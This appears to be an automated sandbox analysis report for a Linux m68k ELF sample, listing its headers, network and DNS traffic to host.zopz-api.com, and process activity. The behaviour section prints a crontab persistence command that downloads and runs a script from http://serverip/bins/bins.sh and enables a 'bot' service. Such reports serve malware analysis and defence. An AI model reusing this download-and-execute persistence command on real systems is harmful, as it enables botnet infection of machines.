                                                  File Content Preview:.ELF.......................D...4..;......4. ...(......................*T..*T...... .......*T..JT..JT......f....... .dt.Q............................NV..a....da.....N^NuNV..J9..M.f>"y..Jl QJ.g.X.#...JlN."y..Jl QJ.f.A.....J.g.Hy..*PN.X.......M.N^NuNV..N^NuN

                                                  ELF header

                                                  Class:ELF32
                                                  Data:2's complement, big endian
                                                  Version:1 (current)
                                                  Machine:MC68000
                                                  Version Number:0x1
                                                  Type:EXEC (Executable file)
                                                  OS/ABI:UNIX - System V
                                                  ABI Version:0
                                                  Entry Point Address:0x80000144
                                                  Flags:0x0
                                                  ELF Header Size:52
                                                  Program Header Offset:52
                                                  Program Header Size:32
                                                  Number of Program Headers:3
                                                  Section Header Offset:80828
                                                  Section Header Size:40
                                                  Number of Section Headers:13
                                                  Header String Table Index:12
                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                  NULL0x00x00x00x00x0000
                                                  .initPROGBITS0x800000940x940x140x00x6AX002
                                                  .textPROGBITS0x800000a80xa80x112e60x00x6AX004
                                                  .finiPROGBITS0x8001138e0x1138e0xe0x00x6AX002
                                                  .rodataPROGBITS0x8001139c0x1139c0x16b10x00x2A002
                                                  .eh_framePROGBITS0x80012a500x12a500x40x00x2A004
                                                  .ctorsPROGBITS0x80014a540x12a540x80x00x3WA004
                                                  .dtorsPROGBITS0x80014a5c0x12a5c0x80x00x3WA004
                                                  .jcrPROGBITS0x80014a640x12a640x40x00x3WA004
                                                  .dataPROGBITS0x80014a680x12a680x3900x00x3WA004
                                                  .bssNOBITS0x80014df80x12df80x62e80x00x3WA004
                                                  .commentPROGBITS0x00x12df80xd6e0x00x0001
                                                  .shstrtabSTRTAB0x00x13b660x560x00x0001
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  LOAD0x00x800000000x800000000x12a540x12a546.28470x5R E0x2000.init .text .fini .rodata .eh_frame
                                                  LOAD0x12a540x80014a540x80014a540x3a40x668c3.09890x6RW 0x2000.ctors .dtors .jcr .data .bss
                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 20, 2024 00:56:55.892488956 CET43928443192.168.2.2391.189.91.42
                                                  Nov 20, 2024 00:56:58.964118004 CET4212453192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:01.523519993 CET42836443192.168.2.2391.189.91.43
                                                  Nov 20, 2024 00:57:02.803369045 CET4251680192.168.2.23109.202.202.202
                                                  Nov 20, 2024 00:57:16.201420069 CET39282443192.168.2.2334.249.145.219
                                                  Nov 20, 2024 00:57:16.201453924 CET4433928234.249.145.219192.168.2.23
                                                  Nov 20, 2024 00:57:16.201558113 CET39282443192.168.2.2334.249.145.219
                                                  Nov 20, 2024 00:57:16.202033043 CET39282443192.168.2.2334.249.145.219
                                                  Nov 20, 2024 00:57:16.202048063 CET4433928234.249.145.219192.168.2.23
                                                  Nov 20, 2024 00:57:16.625426054 CET43928443192.168.2.2391.189.91.42
                                                  Nov 20, 2024 00:57:28.911777973 CET42836443192.168.2.2391.189.91.43
                                                  Nov 20, 2024 00:57:33.007181883 CET4251680192.168.2.23109.202.202.202
                                                  Nov 20, 2024 00:57:38.718327999 CET4213053192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:39.726290941 CET4213053192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:41.742057085 CET4213053192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:45.805432081 CET4213053192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:54.216175079 CET4213253192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:55.244123936 CET4213253192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:57.259840965 CET4213253192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:57.583868980 CET43928443192.168.2.2391.189.91.42
                                                  Nov 20, 2024 00:58:01.419249058 CET4213253192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:58:09.713936090 CET4213453192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:58:10.729957104 CET4213453192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:58:12.745709896 CET4213453192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:58:16.193541050 CET39282443192.168.2.2334.249.145.219
                                                  Nov 20, 2024 00:58:16.235383034 CET4433928234.249.145.219192.168.2.23
                                                  Nov 20, 2024 00:58:16.777122021 CET4213453192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:59:02.161637068 CET4433928234.249.145.219192.168.2.23
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 20, 2024 00:57:01.973237038 CET4066453192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:03.234822035 CET4519753192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:07.223093033 CET5921753192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:08.243406057 CET3677553192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:12.471718073 CET3491853192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:13.246608973 CET4524153192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:17.720997095 CET3644953192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:18.249865055 CET4011953192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:22.970249891 CET4824953192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:23.253140926 CET5252753192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:28.219598055 CET3597353192.168.2.238.8.8.8
                                                  Nov 20, 2024 00:57:33.468842030 CET5770853192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:48.255225897 CET5191553192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:48.966810942 CET5642053192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:53.256874084 CET5361353192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:57:58.260509014 CET4386453192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:03.264420986 CET4456253192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:04.464605093 CET5205253192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:08.268265009 CET3339753192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:19.962522984 CET5807453192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:33.269752979 CET4417253192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:38.271058083 CET4735653192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:43.275012970 CET5567053192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:48.278249979 CET4185053192.168.2.231.1.1.1
                                                  Nov 20, 2024 00:58:53.281084061 CET5124753192.168.2.231.1.1.1
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 20, 2024 00:57:01.973237038 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:03.234822035 CET192.168.2.231.1.1.10x2764Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:07.223093033 CET192.168.2.238.8.8.80x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:08.243406057 CET192.168.2.231.1.1.10x2764Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:12.471718073 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:13.246608973 CET192.168.2.231.1.1.10x2764Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:17.720997095 CET192.168.2.238.8.8.80x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:18.249865055 CET192.168.2.231.1.1.10x2764Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:22.970249891 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:23.253140926 CET192.168.2.231.1.1.10x2764Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:28.219598055 CET192.168.2.238.8.8.80x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:33.468842030 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:48.255225897 CET192.168.2.231.1.1.10x6308Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:48.966810942 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:57:53.256874084 CET192.168.2.231.1.1.10x6308Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:57:58.260509014 CET192.168.2.231.1.1.10x6308Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:03.264420986 CET192.168.2.231.1.1.10x6308Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:04.464605093 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:58:08.268265009 CET192.168.2.231.1.1.10x6308Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:19.962522984 CET192.168.2.231.1.1.10x3d5Standard query (0)cdn.fwupd.org28IN (0x0001)false
                                                  Nov 20, 2024 00:58:33.269752979 CET192.168.2.231.1.1.10x9117Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:38.271058083 CET192.168.2.231.1.1.10x9117Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:43.275012970 CET192.168.2.231.1.1.10x9117Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:48.278249979 CET192.168.2.231.1.1.10x9117Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                                  Nov 20, 2024 00:58:53.281084061 CET192.168.2.231.1.1.10x9117Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false

                                                  System Behavior

                                                  Start time (UTC):23:56:58
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:/tmp/m68k.elf
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:56:58
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:-
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:56:58
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:-
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:-
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:-
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:-
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/crontab
                                                  Arguments:crontab -l
                                                  File size:43720 bytes
                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/chmod
                                                  Arguments:chmod +x bins.sh
                                                  File size:63864 bytes
                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/sh
                                                  Arguments:sh bins.sh
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/curl
                                                  Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
                                                  File size:239848 bytes
                                                  MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/chmod
                                                  Arguments:chmod +x bins.sh
                                                  File size:63864 bytes
                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/sh
                                                  Arguments:sh bins.sh
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:02
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/crontab
                                                  Arguments:crontab -
                                                  File size:43720 bytes
                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/tmp/m68k.elf
                                                  Arguments:-
                                                  File size:4463432 bytes
                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:sh -c "/bin/systemctl enable bot"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/bin/systemctl
                                                  Arguments:/bin/systemctl enable bot
                                                  File size:996584 bytes
                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/lib/systemd/systemd
                                                  Arguments:-
                                                  File size:1620224 bytes
                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                  Start time (UTC):23:57:04
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File size:22760 bytes
                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                  Start time (UTC):23:58:15
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/dash
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:58:15
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                  Start time (UTC):23:58:15
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/dash
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):23:58:15
                                                  Start date (UTC):19/11/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b